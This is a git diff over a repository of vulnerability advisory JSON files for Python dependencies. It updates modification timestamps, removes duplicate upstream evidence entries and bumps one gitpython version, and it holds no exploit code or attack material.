.../BREW-snowflake-cli-CVE-2026-27459.json | 10 +- .../BREW-snowflake-cli-CVE-2026-28684.json | 10 +- .../BREW-snowflake-cli-CVE-2026-32597.json | 10 +- .../BREW-snowflake-cli-CVE-2026-42215.json | 16 +-- .../BREW-snowflake-cli-CVE-2026-42284.json | 16 +-- .../BREW-snowflake-cli-CVE-2026-44243.json | 16 +-- .../BREW-snowflake-cli-CVE-2026-44244.json | 16 +-- .../BREW-snowflake-cli-CVE-2026-44431.json | 10 +- .../BREW-snowflake-cli-CVE-2026-44432.json | 10 +- .../BREW-snowflake-cli-CVE-2026-4539.json | 10 +- .../BREW-snowflake-cli-CVE-2026-45409.json | 10 +- .../BREW-snowflake-cli-CVE-2026-48522.json | 10 +- .../BREW-snowflake-cli-CVE-2026-48523.json | 10 +- .../BREW-snowflake-cli-CVE-2026-48524.json | 10 +- .../BREW-snowflake-cli-CVE-2026-48525.json | 10 +- .../BREW-snowflake-cli-CVE-2026-48526.json | 10 +- .../BREW-snowflake-cli-CVE-2026-59890.json | 10 +- .../BREW-snowflake-cli-CVE-2026-67322.json | 19 +++- .../BREW-snowflake-cli-CVE-2026-67323.json | 21 ++-- .../BREW-snowflake-cli-CVE-2026-67324.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-67325.json | 21 ++-- .../BREW-snowflake-cli-CVE-2026-67326.json | 8 +- .../BREW-snowflake-cli-CVE-2026-69097.json | 8 +- .../BREW-snowflake-cli-CVE-2026-73619.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-73620.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-73621.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-73622.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-73623.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-73624.json | 8 +- .../BREW-snowflake-cli-CVE-2026-73625.json | 11 ++- .../BREW-snowflake-cli-CVE-2026-76217.json | 19 +++- .../BREW-snowflake-cli-CVE-2026-76218.json | 19 +++- .../BREW-snowflake-cli-CVE-2026-76219.json | 21 ++-- .../BREW-snowflake-cli-CVE-2026-76220.json | 19 +++- .../BREW-snowflake-cli-CVE-2026-76221.json | 16 +-- .../BREW-snowflake-cli-CVE-2026-76222.json | 28 +++--- .../BREW-snowflake-cli-CVE-2026-78675.json | 54 +++++++--- .../BREW-snowflake-cli-CVE-2026-78676.json | 42 +++++--- .../BREW-snowflake-cli-CVE-2026-78677.json | 54 +++++++--- .../BREW-snowflake-cli-CVE-2026-78678.json | 40 +++++--- .../BREW-snowflake-cli-CVE-2026-78679.json | 93 ++++++++++++++++++ ...EW-strands-agents-sops-CVE-2017-11424.json | 10 +- ...REW-strands-agents-sops-CVE-2020-7694.json | 16 +-- ...REW-strands-agents-sops-CVE-2020-7695.json | 16 +-- ...EW-strands-agents-sops-CVE-2022-29217.json | 10 +- ...EW-strands-agents-sops-CVE-2023-29159.json | 16 +-- ...EW-strands-agents-sops-CVE-2023-30798.json | 16 +-- ...EW-strands-agents-sops-CVE-2024-24762.json | 10 +- ...REW-strands-agents-sops-CVE-2024-3651.json | 16 +-- ...EW-strands-agents-sops-CVE-2024-47874.json | 16 +-- ...EW-strands-agents-sops-CVE-2024-53861.json | 10 +- ...EW-strands-agents-sops-CVE-2024-53981.json | 10 +- ...EW-strands-agents-sops-CVE-2025-43859.json | 10 +- ...EW-strands-agents-sops-CVE-2025-53365.json | 16 +-- ...EW-strands-agents-sops-CVE-2025-53366.json | 16 +-- ...EW-strands-agents-sops-CVE-2025-54121.json | 16 +-- ...EW-strands-agents-sops-CVE-2025-62727.json | 16 +-- ...EW-strands-agents-sops-CVE-2025-66416.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-24486.json | 10 +- ...EW-strands-agents-sops-CVE-2026-32597.json | 10 +- ...EW-strands-agents-sops-CVE-2026-40347.json | 10 +- ...EW-strands-agents-sops-CVE-2026-42561.json | 10 +- ...EW-strands-agents-sops-CVE-2026-45409.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-48522.json | 10 +- ...EW-strands-agents-sops-CVE-2026-48523.json | 10 +- ...EW-strands-agents-sops-CVE-2026-48524.json | 10 +- ...EW-strands-agents-sops-CVE-2026-48525.json | 10 +- ...EW-strands-agents-sops-CVE-2026-48526.json | 10 +- ...EW-strands-agents-sops-CVE-2026-48710.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-48817.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-48818.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-52869.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-52870.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-53537.json | 10 +- ...EW-strands-agents-sops-CVE-2026-53538.json | 10 +- ...EW-strands-agents-sops-CVE-2026-53539.json | 10 +- ...EW-strands-agents-sops-CVE-2026-53540.json | 10 +- ...EW-strands-agents-sops-CVE-2026-54282.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-54283.json | 16 +-- ...EW-strands-agents-sops-CVE-2026-59950.json | 16 +-- ...REW-strands-agents-sops-CVE-2026-7246.json | 8 +- ...EW-strands-agents-sops-CVE-2026-84378.json | 93 ++++++++++++++++++ ...EW-strands-agents-sops-CVE-2026-84379.json | 89 +++++++++++++++++ ...EW-strands-agents-sops-CVE-2026-84380.json | 89 +++++++++++++++++ ...EW-strands-agents-sops-CVE-2026-84381.json | 98 +++++++++++++++++++ ...EW-strands-agents-sops-CVE-2026-84382.json | 89 +++++++++++++++++ 578 files changed, 2615 insertions(+), 5306 deletions(-) create mode 100644 advisories/BREW-apm-CVE-2026-78679.json create mode 100644 advisories/BREW-oterm-CVE-2026-84378.json create mode 100644 advisories/BREW-oterm-CVE-2026-84379.json create mode 100644 advisories/BREW-oterm-CVE-2026-84380.json create mode 100644 advisories/BREW-oterm-CVE-2026-84381.json create mode 100644 advisories/BREW-oterm-CVE-2026-84382.json create mode 100644 advisories/BREW-snowflake-cli-CVE-2026-78679.json create mode 100644 advisories/BREW-strands-agents-sops-CVE-2026-84378.json create mode 100644 advisories/BREW-strands-agents-sops-CVE-2026-84379.json create mode 100644 advisories/BREW-strands-agents-sops-CVE-2026-84380.json create mode 100644 advisories/BREW-strands-agents-sops-CVE-2026-84381.json create mode 100644 advisories/BREW-strands-agents-sops-CVE-2026-84382.json diff --git a/advisories/BREW-apm-CVE-2013-1633.json b/advisories/BREW-apm-CVE-2013-1633.json index 61594a99b00..fe517aad962 100644 --- a/advisories/BREW-apm-CVE-2013-1633.json +++ b/advisories/BREW-apm-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2013-1633", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2014-1829.json b/advisories/BREW-apm-CVE-2014-1829.json index 61fc87528b6..c6751d5651e 100644 --- a/advisories/BREW-apm-CVE-2014-1829.json +++ b/advisories/BREW-apm-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2014-1829", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2014-1830.json b/advisories/BREW-apm-CVE-2014-1830.json index bd426a3d985..4322d42d38b 100644 --- a/advisories/BREW-apm-CVE-2014-1830.json +++ b/advisories/BREW-apm-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2014-1830", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2015-2296.json b/advisories/BREW-apm-CVE-2015-2296.json index 39f31f5e7ba..ed8526a5581 100644 --- a/advisories/BREW-apm-CVE-2015-2296.json +++ b/advisories/BREW-apm-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2015-2296", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2015-8557.json b/advisories/BREW-apm-CVE-2015-8557.json index 779b9c1dfc6..a5226d79c2f 100644 --- a/advisories/BREW-apm-CVE-2015-8557.json +++ b/advisories/BREW-apm-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2015-8557", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2016-9015.json b/advisories/BREW-apm-CVE-2016-9015.json index 55bc493e99a..72b22fa9a8e 100644 --- a/advisories/BREW-apm-CVE-2016-9015.json +++ b/advisories/BREW-apm-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2016-9015", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2017-18342.json b/advisories/BREW-apm-CVE-2017-18342.json index 3e504b3906c..c1752cfe76b 100644 --- a/advisories/BREW-apm-CVE-2017-18342.json +++ b/advisories/BREW-apm-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2017-18342", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2018-1000518.json b/advisories/BREW-apm-CVE-2018-1000518.json index 2621d24c684..cb1735d0ebf 100644 --- a/advisories/BREW-apm-CVE-2018-1000518.json +++ b/advisories/BREW-apm-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2018-1000518", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.1.1", - "key": "pkg:pypi/websockets@16.1.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2018-18074.json b/advisories/BREW-apm-CVE-2018-18074.json index a89c18d7f34..4f6e8c1c1e3 100644 --- a/advisories/BREW-apm-CVE-2018-18074.json +++ b/advisories/BREW-apm-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2018-18074", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2018-20060.json b/advisories/BREW-apm-CVE-2018-20060.json index d8e08870057..0fb60efc04e 100644 --- a/advisories/BREW-apm-CVE-2018-20060.json +++ b/advisories/BREW-apm-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2018-20060", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2018-25091.json b/advisories/BREW-apm-CVE-2018-25091.json index ca34ace52e2..9e125305e80 100644 --- a/advisories/BREW-apm-CVE-2018-25091.json +++ b/advisories/BREW-apm-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2018-25091", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2019-11236.json b/advisories/BREW-apm-CVE-2019-11236.json index 4d04ec7673e..fd24ec3dbed 100644 --- a/advisories/BREW-apm-CVE-2019-11236.json +++ b/advisories/BREW-apm-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2019-11236", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2019-11324.json b/advisories/BREW-apm-CVE-2019-11324.json index 57a88c6baef..c2166ec18c5 100644 --- a/advisories/BREW-apm-CVE-2019-11324.json +++ b/advisories/BREW-apm-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2019-11324", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2019-20477.json b/advisories/BREW-apm-CVE-2019-20477.json index af91f6e0e0c..4dc397732a9 100644 --- a/advisories/BREW-apm-CVE-2019-20477.json +++ b/advisories/BREW-apm-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2019-20477", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2020-14343.json b/advisories/BREW-apm-CVE-2020-14343.json index a378dc77483..9aa340b9c02 100644 --- a/advisories/BREW-apm-CVE-2020-14343.json +++ b/advisories/BREW-apm-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2020-14343", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2020-1747.json b/advisories/BREW-apm-CVE-2020-1747.json index 39df35c7719..2664f435147 100644 --- a/advisories/BREW-apm-CVE-2020-1747.json +++ b/advisories/BREW-apm-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2020-1747", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2020-26137.json b/advisories/BREW-apm-CVE-2020-26137.json index 6e317f9213f..d6ed416b950 100644 --- a/advisories/BREW-apm-CVE-2020-26137.json +++ b/advisories/BREW-apm-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2020-26137", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2020-7212.json b/advisories/BREW-apm-CVE-2020-7212.json index 93af4fb7a39..adea02adda5 100644 --- a/advisories/BREW-apm-CVE-2020-7212.json +++ b/advisories/BREW-apm-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2020-7212", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2021-20270.json b/advisories/BREW-apm-CVE-2021-20270.json index 274e79a6391..6aca7c972cd 100644 --- a/advisories/BREW-apm-CVE-2021-20270.json +++ b/advisories/BREW-apm-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2021-20270", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2021-21330.json b/advisories/BREW-apm-CVE-2021-21330.json index 0f424b280c0..cf9e44daf1f 100644 --- a/advisories/BREW-apm-CVE-2021-21330.json +++ b/advisories/BREW-apm-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2021-21330", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2021-27291.json b/advisories/BREW-apm-CVE-2021-27291.json index a03db11eb3b..1feaa6e4d26 100644 --- a/advisories/BREW-apm-CVE-2021-27291.json +++ b/advisories/BREW-apm-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2021-27291", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2021-28363.json b/advisories/BREW-apm-CVE-2021-28363.json index 05918b7a821..e66a064e957 100644 --- a/advisories/BREW-apm-CVE-2021-28363.json +++ b/advisories/BREW-apm-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2021-28363", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2021-33503.json b/advisories/BREW-apm-CVE-2021-33503.json index 0090c26ae01..dedd1faa7d0 100644 --- a/advisories/BREW-apm-CVE-2021-33503.json +++ b/advisories/BREW-apm-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2021-33503", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2021-33880.json b/advisories/BREW-apm-CVE-2021-33880.json index 4a1044c329f..4591afcf2f9 100644 --- a/advisories/BREW-apm-CVE-2021-33880.json +++ b/advisories/BREW-apm-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2021-33880", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.1.1", - "key": "pkg:pypi/websockets@16.1.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2022-24439.json b/advisories/BREW-apm-CVE-2022-24439.json index 0c7ff80e652..6ea9feec901 100644 --- a/advisories/BREW-apm-CVE-2022-24439.json +++ b/advisories/BREW-apm-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2022-24439", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.30", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2022-40896.json b/advisories/BREW-apm-CVE-2022-40896.json index aba9d81d804..054082553f1 100644 --- a/advisories/BREW-apm-CVE-2022-40896.json +++ b/advisories/BREW-apm-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2022-40896", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2022-40897.json b/advisories/BREW-apm-CVE-2022-40897.json index b32f6de2e63..439870ffe91 100644 --- a/advisories/BREW-apm-CVE-2022-40897.json +++ b/advisories/BREW-apm-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2022-40897", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-26302.json 